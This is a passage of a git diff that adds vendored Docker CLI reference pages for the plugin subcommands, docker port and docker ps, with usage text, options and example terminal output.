+ID                  NAME                             TAG                 DESCRIPTION                ENABLED
+69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   false
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
new file mode 100644
index 0000000000..df8bee3af5
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
@@ -0,0 +1,65 @@
+---
+title: "plugin enable"
+description: "the plugin enable command description and usage"
+keywords: "plugin, enable"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin enable
+
+```markdown
+Usage:  docker plugin enable [OPTIONS] PLUGIN
+
+Enable a plugin
+
+Options:
+      --help          Print usage
+      --timeout int   HTTP client timeout (in seconds)
+```
+
+Enables a plugin. The plugin must be installed before it can be enabled,
+see [`docker plugin install`](plugin_install.md).
+
+
+The following example shows that the `sample-volume-plugin` plugin is installed,
+but disabled:
+
+```bash
+$ docker plugin ls
+
+ID                  NAME                             TAG                 DESCRIPTION                ENABLED
+69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   false
+```
+
+To enable the plugin, use the following command:
+
+```bash
+$ docker plugin enable tiborvass/sample-volume-plugin
+
+tiborvass/sample-volume-plugin
+
+$ docker plugin ls
+
+ID                  NAME                             TAG                 DESCRIPTION                ENABLED
+69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
new file mode 100644
index 0000000000..fdcc030c43
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
@@ -0,0 +1,164 @@
+---
+title: "plugin inspect"
+description: "The plugin inspect command description and usage"
+keywords: "plugin, inspect"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin inspect
+
+```markdown
+Usage:	docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...]
+
+Display detailed information on one or more plugins
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+Returns information about a plugin. By default, this command renders all results
+in a JSON array.
+
+Example output:
+
+```bash
+$ docker plugin inspect tiborvass/sample-volume-plugin:latest
+```
+```JSON
+{
+  "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21",
+  "Name": "tiborvass/sample-volume-plugin:latest",
+  "PluginReference": "tiborvas/sample-volume-plugin:latest",
+  "Enabled": true,
+  "Config": {
+    "Mounts": [
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": "/data",
+        "Destination": "/data",
+        "Type": "bind",
+        "Options": [
+          "shared",
+          "rbind"
+        ]
+      },
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": null,
+        "Destination": "/foobar",
+        "Type": "tmpfs",
+        "Options": null
+      }
+    ],
+    "Env": [
+      "DEBUG=1"
+    ],
+    "Args": null,
+    "Devices": null
+  },
+  "Manifest": {
+    "ManifestVersion": "v0",
+    "Description": "A test plugin for Docker",
+    "Documentation": "https://docs.docker.com/engine/extend/plugins/",
+    "Interface": {
+      "Types": [
+        "docker.volumedriver/1.0"
+      ],
+      "Socket": "plugins.sock"
+    },
+    "Entrypoint": [
+      "plugin-sample-volume-plugin",
+      "/data"
+    ],
+    "Workdir": "",
+    "User": {
+    },
+    "Network": {
+      "Type": "host"
+    },
+    "Capabilities": null,
+    "Mounts": [
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": "/data",
+        "Destination": "/data",
+        "Type": "bind",
+        "Options": [
+          "shared",
+          "rbind"
+        ]
+      },
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": null,
+        "Destination": "/foobar",
+        "Type": "tmpfs",
+        "Options": null
+      }
+    ],
+    "Devices": [
+      {
+        "Name": "device",
+        "Description": "a host device to mount",
+        "Settable": null,
+        "Path": "/dev/cpu_dma_latency"
+      }
+    ],
+    "Env": [
+      {
+        "Name": "DEBUG",
+        "Description": "If set, prints debug messages",
+        "Settable": null,
+        "Value": "1"
+      }
+    ],
+    "Args": {
+      "Name": "args",
+      "Description": "command line arguments",
+      "Settable": null,
+      "Value": [
+
+      ]
+    }
+  }
+}
+```
+(output formatted for readability)
+
+
+```bash
+$ docker plugin inspect -f '{{.Id}}' tiborvass/sample-volume-plugin:latest
+```
+```
+8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21
+```
+
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin enable](plugin_enable.md)
+* [plugin disable](plugin_disable.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
new file mode 100644
index 0000000000..0601193ce0
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
@@ -0,0 +1,71 @@
+---
+title: "plugin install"
+description: "the plugin install command description and usage"
+keywords: "plugin, install"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin install
+
+```markdown
+Usage:  docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...]
+
+Install a plugin
+
+Options:
+      --alias string            Local name for plugin
+      --disable                 Do not enable the plugin on install
+      --grant-all-permissions   Grant all permissions necessary to run the plugin
+      --help                    Print usage
+```
+
+Installs and enables a plugin. Docker looks first for the plugin on your Docker
+host. If the plugin does not exist locally, then the plugin is pulled from
+the registry. Note that the minimum required registry version to distribute
+plugins is 2.3.0
+
+
+The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable
+`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting
+the user to accept the list of privileges that the plugin needs, settings parameters
+ and enabling the plugin.
+
+```bash
+$ docker plugin install vieux/sshfs DEBUG=1
+
+Plugin "vieux/sshfs" is requesting the following privileges:
+ - network: [host]
+ - device: [/dev/fuse]
+ - capabilities: [CAP_SYS_ADMIN]
+Do you grant the above permissions? [y/N] y
+vieux/sshfs
+```
+
+After the plugin is installed, it appears in the list of plugins:
+
+```bash
+$ docker plugin ls
+
+ID                  NAME                  TAG                 DESCRIPTION                ENABLED
+69553ca1d123        vieux/sshfs           latest              sshFS plugin for Docker    true
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
new file mode 100644
index 0000000000..7a3426d95f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
@@ -0,0 +1,53 @@
+---
+title: "plugin ls"
+description: "The plugin ls command description and usage"
+keywords: "plugin, list"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin ls
+
+```markdown
+Usage:  docker plugin ls [OPTIONS]
+
+List plugins
+
+Aliases:
+  ls, list
+
+Options:
+      --help	   Print usage
+      --no-trunc   Don't truncate output
+```
+
+Lists all the plugins that are currently installed. You can install plugins
+using the [`docker plugin install`](plugin_install.md) command.
+
+Example output:
+
+```bash
+$ docker plugin ls
+
+ID                  NAME                             TAG                 DESCRIPTION                ENABLED
+69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
new file mode 100644
index 0000000000..e61d10994c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
@@ -0,0 +1,50 @@
+---
+title: "plugin push"
+description: "the plugin push command description and usage"
+keywords: "plugin, push"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+```markdown
+Usage:  docker plugin push [OPTIONS] PLUGIN[:TAG]
+
+Push a plugin to a registry
+
+Options:
+      --help       Print usage
+```
+
+Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution,
+use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one.
+
+Registry credentials are managed by [docker login](login.md).
+
+The following example shows how to push a sample `user/plugin`.
+
+```bash
+
+$ docker plugin ls
+ID                  NAME                  TAG                 DESCRIPTION                ENABLED
+69553ca1d456        user/plugin           latest              A sample plugin for Docker false
+$ docker plugin push user/plugin
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
new file mode 100644
index 0000000000..323ce83f3c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
@@ -0,0 +1,56 @@
+---
+title: "plugin rm"
+description: "the plugin rm command description and usage"
+keywords: "plugin, rm"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin rm
+
+```markdown
+Usage:  docker plugin rm [OPTIONS] PLUGIN [PLUGIN...]
+
+Remove one or more plugins
+
+Aliases:
+  rm, remove
+
+Options:
+      -f, --force  Force the removal of an active plugin
+          --help   Print usage
+```
+
+Removes a plugin. You cannot remove a plugin if it is enabled, you must disable
+a plugin using the [`docker plugin disable`](plugin_disable.md) before removing
+it (or use --force, use of force is not recommended, since it can affect
+functioning of running containers using the plugin).
+
+The following example disables and removes the `sample-volume-plugin:latest` plugin;
+
+```bash
+$ docker plugin disable tiborvass/sample-volume-plugin
+tiborvass/sample-volume-plugin
+
+$ docker plugin rm tiborvass/sample-volume-plugin:latest
+tiborvass/sample-volume-plugin
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
new file mode 100644
index 0000000000..c206a8a760
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
@@ -0,0 +1,99 @@
+---
+title: "plugin set"
+description: "the plugin set command description and usage"
+keywords: "plugin, set"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin set
+
+```markdown
+Usage:  docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...]
+
+Change settings for a plugin
+
+Options:
+      --help                    Print usage
+```
+
+Change settings for a plugin. The plugin must be disabled.
+
+The settings currently supported are:
+ * env variables
+ * source of mounts
+ * path of devices
+ * args
+
+The following example change the env variable `DEBUG` on the
+`sample-volume-plugin` plugin.
+
+```bash
+$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin
+[DEBUG=0]
+
+$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1
+
+$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin
+[DEBUG=1]
+```
+
+The following example change the source of the `mymount` mount on
+the `myplugin` plugin.
+
+```bash
+$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
+/foo
+
+$ docker plugins set myplugin mymount.source=/bar
+
+$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
+/bar
+```
+
+Note: since only `source` is settable in `mymount`, `docker plugins set mymount=/bar myplugin` would work too.
+
+The following example change the path of the `mydevice` device on
+the `myplugin` plugin.
+
+```bash
+$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
+/dev/foo
+
+$ docker plugins set myplugin mydevice.path=/dev/bar
+
+$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
+/dev/bar
+```
+
+Note: since only `path` is settable in `mydevice`, `docker plugins set mydevice=/dev/bar myplugin` would work too.
+
+The following example change the source of the args on the `myplugin` plugin.
+
+```bash
+$ docker plugin inspect -f '{{.Settings.Args}}' myplugin
+["foo", "bar"]
+
+$ docker plugins set myplugin args="foo bar baz"
+
+$ docker plugin inspect -f '{{.Settings.Args}}' myplugin
+["foo", "bar", "baz"]
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
new file mode 100644
index 0000000000..20efc577aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
@@ -0,0 +1,84 @@
+---
+title: "plugin upgrade"
+description: "the plugin upgrade command description and usage"
+keywords: "plugin, upgrade"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin upgrade
+
+```markdown
+Usage:  docker plugin upgrade [OPTIONS] PLUGIN [REMOTE]
+
+Upgrade a plugin
+
+Options:
+      --disable-content-trust   Skip image verification (default true)
+      --grant-all-permissions   Grant all permissions necessary to run the plugin
+      --help                    Print usage
+      --skip-remote-check       Do not check if specified remote plugin matches existing plugin image
+```
+
+Upgrades an existing plugin to the specified remote plugin image. If no remote
+is specified, Docker will re-pull the current image and use the updated version.
+All existing references to the plugin will continue to work.
+The plugin must be disabled before running the upgrade.
+
+The following example installs `vieus/sshfs` plugin, uses it to create and use
+a volume, then upgrades the plugin.
+
+```bash
+$ docker plugin install vieux/sshfs DEBUG=1
+
+Plugin "vieux/sshfs:next" is requesting the following privileges:
+ - network: [host]
+ - device: [/dev/fuse]
+ - capabilities: [CAP_SYS_ADMIN]
+Do you grant the above permissions? [y/N] y
+vieux/sshfs:next
+
+$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume
+sshvolume
+$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello"
+$ docker plugin disable -f vieux/sshfs:next
+viex/sshfs:next
+
+# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled
+$ docker volume ls
+DRIVER              VOLUME NAME
+
+$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next
+Plugin "vieux/sshfs:next" is requesting the following privileges:
+ - network: [host]
+ - device: [/dev/fuse]
+ - capabilities: [CAP_SYS_ADMIN]
+Do you grant the above permissions? [y/N] y
+Upgrade plugin vieux/sshfs:next to vieux/sshfs:next
+$ docker plugin enable vieux/sshfs:next
+viex/sshfs:next
+$ docker volume ls
+DRIVER              VOLUME NAME
+viuex/sshfs:next    sshvolume
+$ docker run -it -v sshvolume:/data alpine sh -c "ls /data"
+hello
+```
+
+## Related information
+
+* [plugin create](plugin_create.md)
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md
new file mode 100644
index 0000000000..bc90b6e786
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/port.md
@@ -0,0 +1,41 @@
+---
+title: "port"
+description: "The port command description and usage"
+keywords: "port, mapping, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# port
+
+```markdown
+Usage:  docker port CONTAINER [PRIVATE_PORT[/PROTO]]
+
+List port mappings or a specific mapping for the container
+
+Options:
+      --help   Print usage
+```
+
+You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or
+just a specific mapping:
+
+    $ docker ps
+    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                                            NAMES
+    b650456536c7        busybox:latest      top                 54 minutes ago      Up 54 minutes       0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp   test
+    $ docker port test
+    7890/tcp -> 0.0.0.0:4321
+    9876/tcp -> 0.0.0.0:1234
+    $ docker port test 7890/tcp
+    0.0.0.0:4321
+    $ docker port test 7890/udp
+    2014/06/24 11:53:36 Error: No public port '7890/udp' published for test
+    $ docker port test 7890
+    0.0.0.0:4321
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md
new file mode 100644
index 0000000000..1d5f31da88
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md
@@ -0,0 +1,384 @@
+---
+title: "ps"
+description: "The ps command description and usage"
+keywords: "container, running, list"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# ps
+
+```markdown
+Usage: docker ps [OPTIONS]
+
+List containers
+
+Options:
+  -a, --all             Show all containers (default shows just running)
+  -f, --filter value    Filter output based on conditions provided (default [])
+                        - exited=<int> an exit code of <int>
+                        - label=<key> or label=<key>=<value>
+                        - status=(created|restarting|removing|running|paused|exited)
+                        - name=<string> a container's name
+                        - id=<ID> a container's ID
+                        - before=(<container-name>|<container-id>)
+                        - since=(<container-name>|<container-id>)
+                        - ancestor=(<image-name>[:tag]|<image-id>|<image@digest>)
+                          containers created from an image or a descendant.
+                        - is-task=(true|false)
+                        - health=(starting|healthy|unhealthy|none)
+      --format string   Pretty-print containers using a Go template
+      --help            Print usage
+  -n, --last int        Show n last created containers (includes all states) (default -1)
+  -l, --latest          Show the latest created container (includes all states)
+      --no-trunc        Don't truncate output
+  -q, --quiet           Only display numeric IDs
+  -s, --size            Display total file sizes
+```
+
+Running `docker ps --no-trunc` showing 2 linked containers.
+
+```bash
+$ docker ps
+
+CONTAINER ID        IMAGE                        COMMAND                CREATED              STATUS              PORTS               NAMES
+4c01db0b339c        ubuntu:12.04                 bash                   17 seconds ago       Up 16 seconds       3300-3310/tcp       webapp
+d7886598dbe2        crosbymichael/redis:latest   /redis-server --dir    33 minutes ago       Up 33 minutes       6379/tcp            redis,webapp/db
+```
+
+The `docker ps` command only shows running containers by default. To see all
+containers, use the `-a` (or `--all`) flag:
+
+```bash
+$ docker ps -a
+```
+
+`docker ps` groups exposed ports into a single range if possible. E.g., a
+container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in
+the `PORTS` column.
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more
+than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* id (container's id)
+* label (`label=<key>` or `label=<key>=<value>`)
+* name (container's name)
+* exited (int - the code of exited containers. Only useful with `--all`)
+* status (created|restarting|running|removing|paused|exited|dead)
+* ancestor (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filters containers that were created from the given image or a descendant.
+* before (container's id or name) - filters containers created before given id or name
+* since (container's id or name) - filters containers created since given id or name
+* isolation (default|process|hyperv)   (Windows daemon only)
+* volume (volume name or mount point) - filters containers that mount volumes.
+* network (network id or name) - filters containers connected to the provided network
+* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status
+
+#### Label
+
+The `label` filter matches containers based on the presence of a `label` alone or a `label` and a
+value.
+
+The following filter matches containers with the `color` label regardless of its value.
+
+```bash
+$ docker ps --filter "label=color"
+
+CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+673394ef1d4c        busybox             "top"               47 seconds ago      Up 45 seconds                           nostalgic_shockley
+d85756f57265        busybox             "top"               52 seconds ago      Up 51 seconds                           high_albattani
+```
+
+The following filter matches containers with the `color` label with the `blue` value.
+
+```bash
+$ docker ps --filter "label=color=blue"
+
+CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
+d85756f57265        busybox             "top"               About a minute ago   Up About a minute                       high_albattani
+```
+
+#### Name
+
+The `name` filter matches on all or part of a container's name.
+
+The following filter matches all containers with a name containing the `nostalgic_stallman` string.
+
+```bash
+$ docker ps --filter "name=nostalgic_stallman"
+
+CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+9b6247364a03        busybox             "top"               2 minutes ago       Up 2 minutes                            nostalgic_stallman
+```
+
+You can also filter for a substring in a name as this shows:
+
+```bash
+$ docker ps --filter "name=nostalgic"
+
+CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+715ebfcee040        busybox             "top"               3 seconds ago       Up 1 second                             i_am_nostalgic
+9b6247364a03        busybox             "top"               7 minutes ago       Up 7 minutes                            nostalgic_stallman
+673394ef1d4c        busybox             "top"               38 minutes ago      Up 38 minutes                           nostalgic_shockley
+```
+
+#### Exited
+
+The `exited` filter matches containers by exist status code. For example, to
+filter for containers that have exited successfully:
+
+```bash
+$ docker ps -a --filter 'exited=0'
+
+CONTAINER ID        IMAGE             COMMAND                CREATED             STATUS                   PORTS                      NAMES
+ea09c3c82f6e        registry:latest   /srv/run.sh            2 weeks ago         Exited (0) 2 weeks ago   127.0.0.1:5000->5000/tcp   desperate_leakey
+106ea823fe4e        fedora:latest     /bin/sh -c 'bash -l'   2 weeks ago         Exited (0) 2 weeks ago                              determined_albattani
+48ee228c9464        fedora:20         bash                   2 weeks ago         Exited (0) 2 weeks ago                              tender_torvalds
+```
+
+#### Killed containers
+
+You can use a filter to locate containers that exited with status of `137`
+meaning a `SIGKILL(9)` killed them.
+
+```bash
+$ docker ps -a --filter 'exited=137'
+CONTAINER ID        IMAGE               COMMAND                CREATED             STATUS                       PORTS               NAMES
+b3e1c0ed5bfe        ubuntu:latest       "sleep 1000"           12 seconds ago      Exited (137) 5 seconds ago                       grave_kowalevski
+a2eb5558d669        redis:latest        "/entrypoint.sh redi   2 hours ago         Exited (137) 2 hours ago                         sharp_lalande
+```
+
+Any of these events result in a `137` status:
+
+* the `init` process of the container is killed manually
+* `docker kill` kills the container
+* Docker daemon restarts which kills all running containers
+
+#### Status
+
+The `status` filter matches containers by status. You can filter using
+`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. For example,
+to filter for `running` containers:
+
+```bash
+$ docker ps --filter status=running
+
+CONTAINER ID        IMAGE                  COMMAND             CREATED             STATUS              PORTS               NAMES
+715ebfcee040        busybox                "top"               16 minutes ago      Up 16 minutes                           i_am_nostalgic
+d5c976d3c462        busybox                "top"               23 minutes ago      Up 23 minutes                           top
+9b6247364a03        busybox                "top"               24 minutes ago      Up 24 minutes                           nostalgic_stallman
+```
+
+To filter for `paused` containers:
+
+```bash
+$ docker ps --filter status=paused
+
+CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
+673394ef1d4c        busybox             "top"               About an hour ago   Up About an hour (Paused)                       nostalgic_shockley
+```
+
+#### Ancestor
+
+The `ancestor` filter matches containers based on its image or a descendant of
+it. The filter supports the following image representation:
+
+- image
+- image:tag
+- image:tag@digest
+- short-id
+- full-id
+
+If you don't specify a `tag`, the `latest` tag is used. For example, to filter
+for containers that use the latest `ubuntu` image:
+
+```bash
+$ docker ps --filter ancestor=ubuntu
+
+CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
+919e1179bdb8        ubuntu-c1           "top"               About a minute ago   Up About a minute                       admiring_lovelace
+5d1e4a540723        ubuntu-c2           "top"               About a minute ago   Up About a minute                       admiring_sammet
+82a598284012        ubuntu              "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
+bab2a34ba363        ubuntu              "top"               3 minutes ago        Up 3 minutes                            focused_yonath
+```
+
+Match containers based on the `ubuntu-c1` image which, in this case, is a child
+of `ubuntu`:
+
+```bash
+$ docker ps --filter ancestor=ubuntu-c1
+
+CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
+919e1179bdb8        ubuntu-c1           "top"               About a minute ago   Up About a minute                       admiring_lovelace
+```
+
+Match containers based on the `ubuntu` version `12.04.5` image:
+
+```bash
+$ docker ps --filter ancestor=ubuntu:12.04.5
+
+CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
+82a598284012        ubuntu:12.04.5      "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
+```
+
+The following matches containers based on the layer `d0e008c6cf02` or an image
+that have this layer in its layer stack.
+
+```bash
+$ docker ps --filter ancestor=d0e008c6cf02
+
+CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
+82a598284012        ubuntu:12.04.5      "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
+```
+
+#### Before
+
+The `before` filter shows only containers created before the container with
+given id or name. For example, having these containers created:
+
+```bash
+$ docker ps
+
+CONTAINER ID        IMAGE       COMMAND       CREATED              STATUS              PORTS              NAMES
+9c3527ed70ce        busybox     "top"         14 seconds ago       Up 15 seconds                          desperate_dubinsky
+4aace5031105        busybox     "top"         48 seconds ago       Up 49 seconds                          focused_hamilton
+6e63f6ff38b0        busybox     "top"         About a minute ago   Up About a minute                      distracted_fermat
+```
+
+Filtering with `before` would give:
+
+```bash
+$ docker ps -f before=9c3527ed70ce
+
+CONTAINER ID        IMAGE       COMMAND       CREATED              STATUS              PORTS              NAMES
+4aace5031105        busybox     "top"         About a minute ago   Up About a minute                      focused_hamilton
+6e63f6ff38b0        busybox     "top"         About a minute ago   Up About a minute                      distracted_fermat
+```
+
+#### Since
+
+The `since` filter shows only containers created since the container with given
+id or name. For example, with the same containers as in `before` filter:
+
+```bash
